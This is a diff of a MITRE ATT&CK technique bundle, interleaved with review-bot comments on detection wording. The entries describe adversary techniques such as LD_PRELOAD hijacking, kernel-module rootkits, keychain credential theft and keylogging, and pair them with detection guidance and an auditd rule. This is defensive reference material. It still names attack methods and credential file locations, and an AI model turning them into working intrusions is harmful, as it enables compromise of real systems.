- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)",
- "x_mitre_contributors": [
- "Tim MalcomVetter",
- "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
- ],
- "x_mitre_platforms": [
- "Windows",
- "macOS",
- "Linux",
- "Office 365",
- "SaaS"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_data_sources": [
"SSL/TLS inspection",
"DNS records",
@@ -13380,7 +13866,23 @@
"File monitoring",
"Mail server",
"Office 365 trace logs"
- ]
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux",
+ "Office 365",
+ "SaaS"
+ ],
+ "x_mitre_contributors": [
+ "Tim MalcomVetter",
+ "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
+ ],
+ "x_mitre_detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -13411,18 +13913,83 @@
],
"modified": "2020-02-10T19:52:47.724Z",
"created": "2020-02-10T19:49:46.752Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Binary file metadata"
],
- "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.",
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1059.007",
+ "url": "https://attack.mitre.org/techniques/T1059/007"
+ },
+ {
+ "source_name": "NodeJS",
+ "url": "https://nodejs.org/",
+ "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "JScrip May 2018",
+ "url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript",
+ "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft JScript 2007",
+ "url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript",
+ "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript \u2026. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft Windows Scripts",
+ "url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces",
+ "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "JavaScript/JScript",
+ "description": "Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nAdversaries may abuse JavaScript / JScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",
+ "id": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "modified": "2020-06-25T03:23:13.804Z",
+ "created": "2020-06-23T19:12:24.924Z",
+ "x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.",
+ "x_mitre_data_sources": [
+ "Loaded DLLs",
+ "DLL monitoring",
+ "File monitoring",
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
+ ]
},
{
"external_references": [
@@ -13453,20 +14020,20 @@
],
"modified": "2020-03-15T00:30:25.444Z",
"created": "2020-03-15T00:30:25.444Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0",
@@ -13575,22 +14142,22 @@
],
"modified": "2020-02-27T18:25:30.124Z",
"created": "2020-02-11T18:43:38.588Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)",
- "x_mitre_system_requirements": [
- "Valid domain account or the ability to sniff traffic within a domain"
+ "x_mitre_contributors": [
+ "Praetorian"
],
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs"
],
- "x_mitre_contributors": [
- "Praetorian"
- ]
+ "x_mitre_system_requirements": [
+ "Valid domain account or the ability to sniff traffic within a domain"
+ ],
+ "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -13724,6 +14291,11 @@
"description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.",
"source_name": "Securelist Ventir"
},
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ },
{
"url": "http://tldp.org/HOWTO/Module-HOWTO/x197.html",
"description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.",
@@ -13740,7 +14312,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Kernel Modules and Extensions",
- "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)\u00a0\n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide)\u00a0Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)",
+ "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)\u00a0\n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide)\u00a0Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)",
"id": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -13753,26 +14325,27 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-25T16:14:29.149Z",
+ "modified": "2020-06-30T21:23:15.188Z",
"created": "2020-01-24T17:42:23.339Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
- ],
- "x_mitre_contributors": [
- "Jeremy Galloway",
- "Red Canary"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "root"
],
+ "x_mitre_detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nFor macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nFor macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.\n\nAdversaries will likely run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)",
- "x_mitre_permissions_required": [
- "root"
+ "x_mitre_contributors": [
+ "Anastasios Pingios",
+ "Jeremy Galloway",
+ "Red Canary"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ]
},
{
"id": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d",
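Review bot: The rewritten x_mitre_detection string for Kernel Modules and Extensions still keys detection only on the user-space loader commands (modprobe, insmod, lsmod, rmmod, modinfo), so a loader that issues the init_module/finit_module syscalls itself, or one that insmods a .ko from a path outside /lib/modules, leaves no signal this text covers, and the object's x_mitre_data_sources remain just "Process monitoring" and "Process command-line parameters". Consider appending to the detection text `Auditd can also record module loads directly with rules on the init_module, finit_module and delete_module syscalls (e.g. -a always,exit -F arch=b64 -S init_module,finit_module,delete_module -k modules), which catches loaders that bypass modprobe/insmod.` and adding `"System calls"` to x_mitre_data_sources (a value this bundle already uses for the Keychain object). The phrase "LKMs are typically loaded into /lib/modules" would read more accurately as "stored under /lib/modules", since insmod accepts any path. These are wording and coverage points on the new text; the surrounding JSON object is otherwise unchanged apart from key reordering.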
@@ -13800,6 +14373,15 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-02-12T18:55:24.728Z",
+ "modified": "2020-02-17T13:14:31.140Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3",
"description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user\u2019s logon credentials.",
"name": "Keychain",
@@ -13824,33 +14406,31 @@
"source_name": "External to DA, the OS X Way"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
+ "x_mitre_platforms": [
+ "macOS"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.",
+ "x_mitre_permissions_required": [
+ "Administrator"
],
- "modified": "2020-02-17T13:14:31.140Z",
- "created": "2020-02-12T18:55:24.728Z",
"x_mitre_data_sources": [
"PowerShell logs",
"Process monitoring",
"File monitoring",
"System calls",
"API monitoring"
- ],
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "macOS"
]
},
{
+ "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.",
+ "name": "Keylogging",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -13868,13 +14448,6 @@
"source_name": "Adventures of a Keystroke"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Keylogging",
- "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.",
- "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -13971,21 +14544,21 @@
],
"modified": "2020-03-24T16:50:36.235Z",
"created": "2020-01-24T14:21:52.750Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Process monitoring",
"Binary file metadata"
],
- "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "attack-pattern--a0a189c8-d3bd-4991-bf6f-153d185ee373",
@@ -14021,31 +14594,31 @@
],
"modified": "2020-03-30T13:53:57.518Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "Binary file metadata",
- "Malware reverse engineering",
- "Process monitoring"
- ],
- "x_mitre_detection": "Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.",
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Process whitelisting",
- "Whitelisting by file name or path"
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "macOS"
],
"x_mitre_permissions_required": [
"User",
"Administrator"
],
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_defense_bypassed": [
+ "Application whitelisting",
+ "Process whitelisting",
+ "Whitelisting by file name or path"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.",
+ "x_mitre_data_sources": [
+ "Binary file metadata",
+ "Malware reverse engineering",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
- "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)\n\nLD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)\n\nAdversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)\n\nLD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.",
"name": "LD_PRELOAD",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
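Review bot: The new LD_PRELOAD description sentence "LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file" omits the privilege caveat that the newly cited ld.so(8) page documents and that bears on the later "possibly elevated privileges" claim: in secure-execution mode (set-user-ID/set-group-ID programs and similar) the dynamic linker ignores LD_PRELOAD entries containing a slash and only honours slash-free names from the standard directories when the object is itself set-user-ID, whereas /etc/ld.so.preload applies to every program system-wide but is writable only by root. I would add, after that sentence, `The environment variable is ignored for set-user-ID and other secure-execution programs, while /etc/ld.so.preload applies system-wide but requires root to modify, so the file is primarily a persistence vector rather than an escalation one.` The carried-over typo "with be loaded and mapped" should read "will be loaded and mapped". The `dlopen()`/`mmap()` attribution in that same sentence is inherited from the old text and is presumably imprecise for startup preloads handled by ld.so itself, but I have not verified it against the citations here.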
@@ -14057,6 +14630,11 @@
"external_id": "T1574.006",
"url": "https://attack.mitre.org/techniques/T1574/006"
},
+ {
+ "source_name": "Man LD.SO",
+ "url": "https://www.man7.org/linux/man-pages/man8/ld.so.8.html",
+ "description": "Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020."
+ },
{
"source_name": "TLDP Shared Libraries",
"url": "https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html",
@@ -14093,19 +14671,19 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T18:46:55.796Z",
+ "modified": "2020-06-15T21:59:25.358Z",
"created": "2020-03-13T20:09:59.569Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Monitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"Environment variable"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
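Review bot: The updated x_mitre_detection text "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD" is ambiguous, because LD_PRELOAD is an environment variable rather than a file, and the file the commit's own description change introduces, /etc/ld.so.preload, is never named on the detection side. I would rewrite the opening as `Monitor for changes to environment variables (e.g., LD_PRELOAD) and to files the dynamic linker consults, in particular /etc/ld.so.preload, as well as the commands used to implement these changes.` On most distributions that file is absent or empty, so its creation or modification is presumably a high-fidelity file-integrity alert worth calling out explicitly, and "File monitoring" is already in x_mitre_data_sources so no further schema change is needed.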
@@ -14240,14 +14818,9 @@
],
"modified": "2020-03-31T13:54:08.239Z",
"created": "2020-02-11T19:08:51.677Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Eric Kuehn, Secure Ideas",
+ "Matthew Demaske, Adaptforward"
],
"x_mitre_data_sources": [
"Windows event logs",
@@ -14255,9 +14828,14 @@
"Packet capture",
"Netflow/Enclave netflow"
],
- "x_mitre_contributors": [
- "Eric Kuehn, Secure Ideas",
- "Matthew Demaske, Adaptforward"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -14309,22 +14887,22 @@
],
"modified": "2020-03-24T20:35:42.440Z",
"created": "2020-02-21T16:22:09.493Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
"x_mitre_data_sources": [
"Process monitoring",
"PowerShell logs",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
